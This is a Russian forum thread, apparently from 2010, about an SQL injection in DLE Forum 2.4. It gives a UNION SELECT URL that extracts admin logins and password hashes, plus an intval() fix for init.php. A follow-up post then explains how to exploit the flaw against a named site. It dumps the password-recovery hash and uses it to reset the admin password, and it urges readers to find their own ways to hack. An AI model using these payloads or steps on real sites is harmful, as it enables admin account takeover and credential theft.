В DLE Forum 2.4 есть уязвимость, которая позволяет выполнять запросы в бд, и узнавать любую инфу, например о логинах и о паролях.
У кого стоит данная версия форума, рекомендуется проверить на уязвимость: ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_ group=1+limit+1-- ,
Если ВАш сайт уязвим, то в заголовке страницы будет отображен логин, и хеш пароля.
Уязвимость находится в скрипте engine/forum/sources/components/init.php в 446 строке!
Code
if ($_REQUEST['category'])
{
$act = 'category';$cid =$_REQUEST['category'];
$t_act = '?c'.$cid;
}
if ($_REQUEST['showforum'])
{
$act = 'forum';
$fid = $_REQUEST['showforum'];
$t_act = '?f'.$fid;
}
if ($_REQUEST['showtopic'])
{
$act = 'topic';
$tid = $_REQUEST['showtopic'];
$t_act = '?t'.$tid;
}
Данный код необходимо заменить на:
if ($_REQUEST['category'])
{
$act = 'category';
$cid = intval($_REQUEST['category']);
$t_act = '?c'.$cid;
}
if ($_REQUEST['showforum'])
{
$act = 'forum';
$fid = intval($_REQUEST['showforum']);
$t_act = '?f'.$fid;
}
if ($_REQUEST['showtopic'])
{
$act = 'topic';
$tid = intval($_REQUEST['showtopic']);
$t_act = '?t'.$tid;
}
Добавлено (14.06.2010, 16:52)
---------------------------------------------
Как юзать грамотно сию багу
на 8dle.ru был установлен форум с уязвимостью sql inj
сначала идем на страницу 8dle.ru/?do=lostpassword
В поле вписываем имя админа
Далее в поле PREFIX_lostdb хранится хеш, который отсылается на почту, если открыть правильную ссылку с хешем получается такая же уязвимость как и на 8,2 с востановлением
И так мы снегерировали хешь, осталось только достать его из базы
_http://8dle.ru/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS (0x3a, lostname,lostid),4,5,6,7,8,9,10,11,12,13,14,15,16, 17 ,18,19,20,21,22,23+from+8dle_lostdb+where+lostname =ID+limit+1-- (Пробелы надо стереть).
указываете ID юзера которого ломаем
смотрим в исходнике полученной страницы
*** >> Darknull:md5 <br /> Копируем хешь и идем на ссылку <br /> 8dle.ru/?do=lostpassword&douser=ID&lostid=md5 <br /> вот и перед вами новый админский пароль <br /> Если все сделано верно то вы гений <br /> P.S. 8dle.ru уже залатали востановление пароля <br /> так что ищите свои методы взлома</span>
<br><hr class="signatureHr" align="left" width="150" size="1"><span class="signatureView"><img src="http://life-psp.ru/kartinki/2b2ef4084ff0.gif" border="0" alt=""/></span>
</td></tr>
<tr><td class="postBottom" align="center"> </td><td class="postBottom">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td><a href="/index/8-1"><img alt="" style="margin:0;padding:0;border:0;" src="/.s/img/fr/bt/36/p_profile.gif" title="Профиль пользователя" /></a> <img alt="" style="cursor:pointer;margin:0;padding:0;border:0;" src="/.s/img/fr/bt/36/p_www.gif" title="Домашняя страница" onclick="window.open('http://life-psp.ru')" /> <img alt="" style="cursor:pointer;margin:0;padding:0;border:0;" src="/.s/img/fr/bt/36/p_icq.gif" title="ICQ: 975788" onclick="prompt('ICQ number','975788');" /></td><td style="padding-right: 15px;" align="right"></td><td align="right" width="2%" nowrap="nowrap"><a class="goOnTop" href="javascript:scroll(0,0);"><img alt="" style="margin:0;padding:0;border:0;" src="/.s/img/fr/bt/36/p_up.gif" title="Вверх" /></a></td></tr>
</tbody></table></td></tr></tbody></table></td></tr></table></div></div><div class="gDivBottomLeft"></div><div class="gDivBottomCenter"></div><div class="gDivBottomRight"></div>
<table class="ThrBotTbl" border="0" width="100%" cellspacing="0" cellpadding="0">
<tr class="ThrBotRow1"><td colspan="2" class="bottomPathBar ThrBotCl11" style="padding-top:2px;">
<table class="ThrForumBarTbl" border="0" width="100%" cellspacing="0" cellpadding="0">
<tr class="ThrForumBarRow1">
<td class="forumNamesBar ThrForumBarCl11 breadcrumbs" style="padding-top:3px;padding-bottom:5px;">
<a class="forumBar breadcrumb-item" href="/forum/">Форум Life-PSP.ru</a> <span class="breadcrumb-sep">»</span> <a class="forumBar breadcrumb-item" href="/forum/40">Форум по DataLife Engine (DLE)</a> <span class="breadcrumb-sep">»</span> <a class="forumBar breadcrumb-item" href="/forum/44">Баги-фиксы</a> <span class="breadcrumb-sep">»</span> <a class="forumBarA" href="/forum/44-231-1">SQL – инъекция в DLE-Forum 2.4</a></td><td class="ThrForumBarCl12" >
<script>
function check_search(form ) {
if ( form.s.value.length < 3 ) {
_uWnd.alert('Вы ввели слишком короткий поисковой запрос.', '', { w:230, h:80, tm:3000 })
return false
}
return true
}
</script>
<form id="thread_search_form" onsubmit="return check_search(this)" action="/forum/44-231" method="GET">
<input class="fastNav" type="submit" value="Ok" id="thread_search_button"><input type="text" name="s" value="" placeholder="Поиск по теме" id="thread_search_field"/>
</form>
</td></tr>
</table></td></tr>
<tr class="ThrBotRow2"><td class="ThrBotCl21" width="50%">
<ul class="switches switchesTbl forum-pages">
<li class="pagesInfo">Страница <span class="curPage">1</span> из <span class="numPages">1</span></li>
<li class="switchActive">1</li>
</ul></td><td class="ThrBotCl22" align="right" nowrap="nowrap"><form name="navigation" style="margin:0px"><table class="navigationTbl" border="0" cellspacing="0" cellpadding="0"><tr class="navigationRow1"><td class="fFastNavTd navigationCl11" >
<select class="fastNav" name="fastnav"><option class="fastNavMain" value="0">Главная страница форума</option><option class="fastNavCat" value="1">PSP-Life</option><option class="fastNavForum" value="2"> Информационный раздел</option><option class="fastNavForum" value="3"> Флудилка</option><option class="fastNavForum" value="4"> Игры на форуме</option><option class="fastNavForum" value="5"> Конкурсы</option><option class="fastNavCat" value="6">Portable Sony Playstation</option><option class="fastNavForum" value="7"> Вопросы по PSP</option><option class="fastNavForum" value="8"> F.A.Q</option><option class="fastNavForum" value="9"> Коды,Читы,Пароли для PSP</option><option class="fastNavForum" value="10"> Всё о прошивках PSP</option><option class="fastNavForum" value="11"> Моддинг PSP</option><option class="fastNavForum" value="18"> Новости из мира SONY</option><option class="fastNavCat" value="50">Закачка</option><option class="fastNavForum" value="30"> Игры на PC</option><option class="fastNavForum" value="51"> Игры для PsP</option><option class="fastNavForum" value="52"> Фильмы для PsP</option><option class="fastNavCat" value="12">Курилка</option><option class="fastNavForum" value="13"> О разном</option><option class="fastNavForum" value="14"> Музыка</option><option class="fastNavForum" value="15"> Фильмы</option><option class="fastNavForum" value="49"> Фото</option><option class="fastNavForum" value="16"> Спорт</option><option class="fastNavForum" value="17"> Юмор</option><option class="fastNavForum" value="19"> Игровой форум</option><option class="fastNavForum" value="20"> Полезные программы</option><option class="fastNavForum" value="21"> Авто-форум</option><option class="fastNavForum" value="22"> Популярная психология</option><option class="fastNavForum" value="23"> Читалка</option><option class="fastNavForum" value="24"> КИНОмания</option><option class="fastNavCat" value="25">Техномир</option><option class="fastNavForum" value="27"> Графика</option><option class="fastNavForum" value="28"> Интернет</option><option class="fastNavForum" value="29"> Программирование</option><option class="fastNavCat" value="32">Форум по продуктам Adobe</option><option class="fastNavForum" value="33"> Новости</option><option class="fastNavForum" value="34"> Вопросы по Photoshop и After Effects</option><option class="fastNavForum" value="35"> Уроки After Effects</option><option class="fastNavForum" value="36"> Готовые работы и исходники After Effects</option><option class="fastNavForum" value="37"> Уроки Photoshop</option><option class="fastNavForum" value="38"> Видеоуроки Photoshop</option><option class="fastNavForum" value="39"> Готовые PSD работы</option><option class="fastNavCat" value="40">Форум по DataLife Engine (DLE)</option><option class="fastNavForum" value="41"> Информация</option><option class="fastNavForum" value="42"> Вопросы</option><option class="fastNavForum" value="43"> Разговоры о DLE</option><option class="fastNavForumA" value="44" selected> Баги-фиксы</option><option class="fastNavCat" value="45">Програмное обеспечение</option><option class="fastNavForum" value="46"> Вопросы по ПК</option><option class="fastNavForum" value="47"> Проверенные и нужные программы</option><option class="fastNavForum" value="48"> Вопросы по Софту</option></select>
<input class="fastNav" type="button" value="Ok" onclick="top.location.href='/forum/'+(document.navigation.fastnav.value!='0'?document.navigation.fastnav.value:'');" />
</td></tr></table></form></td></tr>
<tr class="ThrBotRow3"><td class="ThrBotCl31"><div class="fFastLogin" style="padding-top:5px;padding-bottom:5px;"><input class="fastLogBt" type="button" value="Быстрый вход" onclick="loginPopupForm();" /></div></td><td class="ThrBotCl32" align="right" nowrap="nowrap"><form method="post" action="/forum/" style="margin:0px"><table class="FastSearchTbl" border="0" cellspacing="0" cellpadding="0"><tr class="FastSearchRow1"><td class="fFastSearchTd FastSearchCl11" >Поиск: <input class="fastSearch" type="text" style="width:150px" name="kw" placeholder="keyword" size="20" maxlength="60" /><input class="fastSearch" type="submit" value="Ok" /></td></tr></table><input type="hidden" name="a" value="6" /></form></td></tr>
</table>
<script type="text/javascript">
$('span.forumViewed').each(function (i, g) {
$.get($(this).parent().find('a.forum').attr('href'), function (data) {
g.innerHTML = '[' + $('td.forumOnlineBar:first', data).html().replace('Гость', '') + ']';
});
});
</script></div><br />
<div align="center"><!-- "' --><span class="pbhrTLX2">Используются технологии <a href="https://www.ucoz.ru/"><b>uCoz</b></a></span></div>
</body>
</html>
<!-- 0.10048 (s40) -->
